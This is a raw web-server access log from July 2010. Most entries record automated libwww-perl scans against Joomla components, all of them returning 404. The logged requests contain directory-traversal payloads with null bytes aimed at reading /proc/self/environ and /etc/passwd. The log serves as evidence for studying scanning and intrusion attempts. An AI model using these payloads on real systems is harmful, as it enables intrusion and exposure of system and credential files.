99.198.108.74 - - [28/Jul/2010:12:28:39 +0200] "GET /*.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.831"
174.121.191.5 - - [28/Jul/2010:12:40:42 +0200] "GET /logs/access_log/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.810"
174.121.191.5 - - [28/Jul/2010:12:40:43 +0200] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.810"
174.121.191.5 - - [28/Jul/2010:12:40:43 +0200] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
87.98.217.83 - - [28/Jul/2010:12:54:44 +0200] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
74.52.6.194 - - [28/Jul/2010:13:12:54 +0200] "GET /logs//index2.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.810"
74.52.6.194 - - [28/Jul/2010:13:12:54 +0200] "GET //index2.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
74.52.6.194 - - [28/Jul/2010:13:13:15 +0200] "GET /logs//index2.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.810"
74.52.6.194 - - [28/Jul/2010:13:13:15 +0200] "GET //index2.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
62.44.82.118 - - [28/Jul/2010:13:28:31 +0200] "GET /logs/access_log//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.803"
62.44.82.118 - - [28/Jul/2010:13:28:31 +0200] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
62.44.82.118 - - [28/Jul/2010:13:28:31 +0200] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
62.44.82.118 - - [28/Jul/2010:13:29:44 +0200] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
91.121.78.216 - - [28/Jul/2010:13:33:53 +0200] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
91.121.78.216 - - [28/Jul/2010:13:33:54 +0200] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
188.165.213.8 - - [28/Jul/2010:13:34:08 +0200] "GET ///index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
213.180.89.75 - - [28/Jul/2010:13:34:25 +0200] "GET ///index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
125.141.91.138 - - [28/Jul/2010:13:38:51 +0200] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
125.141.91.138 - - [28/Jul/2010:13:38:59 +0200] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
119.192.156.54 - - [28/Jul/2010:13:38:59 +0200] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
119.192.156.54 - - [28/Jul/2010:13:39:00 +0200] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
212.241.251.207 - - [28/Jul/2010:13:40:55 +0200] "GET /logs/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
212.241.251.207 - - [28/Jul/2010:13:40:55 +0200] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
91.121.78.216 - - [28/Jul/2010:13:41:49 +0200] "GET /logs/access_log/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.803"
91.121.78.216 - - [28/Jul/2010:13:41:50 +0200] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
91.121.78.216 - - [28/Jul/2010:13:41:50 +0200] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
91.121.78.216 - - [28/Jul/2010:13:41:55 +0200] "GET /logs/access_log/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.803"
91.121.78.216 - - [28/Jul/2010:13:41:55 +0200] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
91.121.78.216 - - [28/Jul/2010:13:41:55 +0200] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
212.241.251.207 - - [28/Jul/2010:13:42:10 +0200] "GET /logs/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
212.241.251.207 - - [28/Jul/2010:13:42:10 +0200] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
212.241.251.207 - - [28/Jul/2010:13:45:04 +0200] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
212.241.251.207 - - [28/Jul/2010:13:45:37 +0200] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
212.241.251.207 - - [28/Jul/2010:13:47:07 +0200] "GET /logs/access_log/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.803"
212.241.251.207 - - [28/Jul/2010:13:47:07 +0200] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
212.241.251.207 - - [28/Jul/2010:13:47:08 +0200] "GET /logs/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
212.241.251.207 - - [28/Jul/2010:13:47:59 +0200] "GET /logs/access_log/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.803"
212.241.251.207 - - [28/Jul/2010:13:47:59 +0200] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
212.241.251.207 - - [28/Jul/2010:13:47:59 +0200] "GET /logs/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
119.192.156.54 - - [28/Jul/2010:13:48:01 +0200] "GET /logs/access_log/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
125.141.91.138 - - [28/Jul/2010:13:48:01 +0200] "GET /logs/access_log/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
119.192.156.54 - - [28/Jul/2010:13:48:01 +0200] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
119.192.156.54 - - [28/Jul/2010:13:48:02 +0200] "GET /logs/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
125.141.91.138 - - [28/Jul/2010:13:48:03 +0200] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
125.141.91.138 - - [28/Jul/2010:13:48:04 +0200] "GET /logs/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
119.192.156.54 - - [28/Jul/2010:13:48:06 +0200] "GET /logs/access_log/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
119.192.156.54 - - [28/Jul/2010:13:48:07 +0200] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
119.192.156.54 - - [28/Jul/2010:13:48:07 +0200] "GET /logs/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
125.141.91.138 - - [28/Jul/2010:13:48:18 +0200] "GET /logs/access_log/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
125.141.91.138 - - [28/Jul/2010:13:48:18 +0200] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
125.141.91.138 - - [28/Jul/2010:13:48:19 +0200] "GET /logs/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
213.180.89.75 - - [28/Jul/2010:13:48:37 +0200] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
188.165.213.8 - - [28/Jul/2010:13:55:18 +0200] "GET /logs/access_log///index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.803"
188.165.213.8 - - [28/Jul/2010:13:55:18 +0200] "GET ///index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
188.165.213.8 - - [28/Jul/2010:13:55:18 +0200] "GET /logs///index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
213.180.89.75 - - [28/Jul/2010:13:55:19 +0200] "GET /logs/access_log///index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
213.180.89.75 - - [28/Jul/2010:13:55:19 +0200] "GET ///index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
213.180.89.75 - - [28/Jul/2010:13:55:19 +0200] "GET /logs///index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
213.180.89.75 - - [28/Jul/2010:14:12:41 +0200] "GET /logs/access_log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
213.180.89.75 - - [28/Jul/2010:14:12:41 +0200] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
213.180.89.75 - - [28/Jul/2010:14:12:41 +0200] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
74.52.6.194 - - [28/Jul/2010:14:17:30 +0200] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
188.165.217.175 - - [28/Jul/2010:14:17:31 +0200] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
91.121.141.186 - - [28/Jul/2010:14:17:31 +0200] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
74.52.6.194 - - [28/Jul/2010:14:17:53 +0200] "GET /logs/access_log//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
74.52.6.194 - - [28/Jul/2010:14:17:54 +0200] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
74.52.6.194 - - [28/Jul/2010:14:17:54 +0200] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
74.52.6.194 - - [28/Jul/2010:14:18:54 +0200] "GET /logs/access_log//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
74.52.6.194 - - [28/Jul/2010:14:18:54 +0200] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
74.52.6.194 - - [28/Jul/2010:14:18:54 +0200] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
91.121.141.186 - - [28/Jul/2010:14:19:16 +0200] "GET /logs/access_log//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
91.121.141.186 - - [28/Jul/2010:14:19:16 +0200] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
91.121.141.186 - - [28/Jul/2010:14:19:16 +0200] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
188.165.217.175 - - [28/Jul/2010:14:20:40 +0200] "GET /logs/access_log//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
188.165.217.175 - - [28/Jul/2010:14:20:40 +0200] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
188.165.217.175 - - [28/Jul/2010:14:20:40 +0200] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
188.165.217.175 - - [28/Jul/2010:14:21:12 +0200] "GET /logs/access_log//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
188.165.217.175 - - [28/Jul/2010:14:21:12 +0200] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
188.165.217.175 - - [28/Jul/2010:14:21:12 +0200] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
91.121.141.186 - - [28/Jul/2010:14:21:21 +0200] "GET /logs/access_log//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
91.121.141.186 - - [28/Jul/2010:14:21:22 +0200] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
91.121.141.186 - - [28/Jul/2010:14:21:22 +0200] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
125.141.91.138 - - [28/Jul/2010:14:22:00 +0200] "GET //index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
125.141.91.138 - - [28/Jul/2010:14:22:02 +0200] "GET //index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
119.192.156.54 - - [28/Jul/2010:14:22:07 +0200] "GET //index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
125.141.91.138 - - [28/Jul/2010:14:25:34 +0200] "GET /logs/access_log//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
125.141.91.138 - - [28/Jul/2010:14:25:34 +0200] "GET //index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
125.141.91.138 - - [28/Jul/2010:14:25:35 +0200] "GET /logs//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
125.141.91.138 - - [28/Jul/2010:14:25:36 +0200] "GET /logs/access_log//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
119.192.156.54 - - [28/Jul/2010:14:25:36 +0200] "GET /logs/access_log//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
119.192.156.54 - - [28/Jul/2010:14:25:37 +0200] "GET //index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
125.141.91.138 - - [28/Jul/2010:14:25:37 +0200] "GET //index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
119.192.156.54 - - [28/Jul/2010:14:25:37 +0200] "GET /logs//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
125.141.91.138 - - [28/Jul/2010:14:25:37 +0200] "GET /logs//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
85.13.219.90 - - [28/Jul/2010:14:50:59 +0200] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
85.13.219.90 - - [28/Jul/2010:14:50:59 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
85.13.219.90 - - [28/Jul/2010:14:51:07 +0200] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
85.13.219.90 - - [28/Jul/2010:14:51:07 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
209.97.216.92 - - [28/Jul/2010:14:52:50 +0200] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.79"
209.97.216.92 - - [28/Jul/2010:14:52:50 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
207.46.195.239 - - [28/Jul/2010:15:02:53 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
188.228.33.237 - - [28/Jul/2010:15:03:00 +0200] "GET /logs/error_log/ HTTP/1.0" 404 301 "http://newark.comites-it.org/logs/error_log/" "Opera/9.0 (Windows NT 5.1; U; en)"
188.228.33.237 - - [28/Jul/2010:15:03:00 +0200] "GET / HTTP/1.0" 200 559 "http://newark.comites-it.org/" "Opera/9.0 (Windows NT 5.1; U; en)"
207.46.195.239 - - [28/Jul/2010:15:06:00 +0200] "GET / HTTP/1.1" 200 559 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.71.245.122 - - [28/Jul/2010:15:09:09 +0200] "GET /logs//index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
66.71.245.122 - - [28/Jul/2010:15:09:09 +0200] "GET //index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
